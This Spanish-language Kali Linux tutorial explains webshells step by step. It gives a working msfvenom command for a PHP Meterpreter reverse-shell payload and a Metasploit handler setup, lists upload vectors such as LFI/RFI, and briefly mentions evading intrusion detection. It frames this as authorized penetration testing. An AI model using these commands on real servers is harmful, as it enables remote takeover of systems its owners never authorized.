Hacking y Ciberseguridad con kali linux Webshells
Hacking y Ciberseguridad con kali linux Webshells
Para utilizar la herramienta Kali Webshells, primero necesitas entender qué es un webshell. Un webshell es un script malicioso que un atacante sube a un servidor web para obtener control remoto sobre él. La herramienta Kali Webshells facilita la creación y gestión de estos scripts.
Pasos para usar Kali Webshells
Encontrar la herramienta: La herramienta Webshells no es un programa independiente en Kali Linux. En realidad, es una categoría de scripts y herramientas que se encuentran dentro de la distribución. No existe un comando
kali-webshells
como tal. Los webshells más comunes ya vienen preinstalados en Kali Linux o se pueden generar fácilmente con herramientas como Msfvenom (parte de Metasploit Framework).Generar el webshell: La forma más común de crear un webshell es usando
Msfvenom
. Puedes generar un webshell en diferentes lenguajes de programación, como PHP, ASP o JSP.Ejemplo para PHP:
Bashmsfvenom -p php/meterpreter/reverse_tcp LHOST=<tu_ip> LPORT=<puerto> -f raw > shell.php
Aquí,
-p
especifica el payload (el webshell),LHOST
es la dirección IP de tu máquina Kali (donde recibirás la conexión) yLPORT
es el puerto.
Subir el webshell al servidor: Una vez que tienes el archivo (
shell.php
en este ejemplo), necesitas encontrar una vulnerabilidad en el servidor web para subirlo. Esto podría ser a través de una página de subida de archivos no segura, una vulnerabilidad de inclusión de archivos (LFI/RFI
) o una inyección de código.Establecer un "listener": Antes de activar el webshell, debes configurar un programa en tu máquina Kali para que "escuche" la conexión entrante desde el servidor. Metasploit Framework es la herramienta ideal para esto.
Abrir
msfconsole
:Bashmsfconsole
Configurar el listener:
Bashuse exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST <tu_ip> set LPORT <puerto> exploit
Asegúrate de que
LHOST
yLPORT
coincidan con los valores que usaste al generar el webshell.
Activar el webshell: Finalmente, navega a la URL del webshell que subiste en el servidor (por ejemplo,
http://servidor-vulnerable.com/ruta/shell.php
). Al acceder a esta URL, el webshell se ejecutará, se conectará a tu "listener" en Kali y te dará una sesión de Meterpreter para controlar remotamente el servidor.
Precauciones y consideraciones
Este proceso es parte de las pruebas de penetración y solo debe realizarse en sistemas para los que tienes permiso explícito.
El uso de webshells sin autorización es ilegal y puede tener graves consecuencias.
Los webshells pueden ser detectados por antivirus y sistemas de detección de intrusos (IDS/IPS), por lo que su uso requiere técnicas para evadir la detección.